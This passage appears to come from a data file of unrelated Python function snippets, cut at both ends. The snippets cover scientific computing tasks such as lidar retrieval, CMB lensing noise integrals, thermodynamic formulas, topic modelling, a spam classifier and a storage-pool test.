HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def _r_inv(self):\n raise NotImplementedError", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def prove_I0() -> Proof:\n # Task 4.8", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not 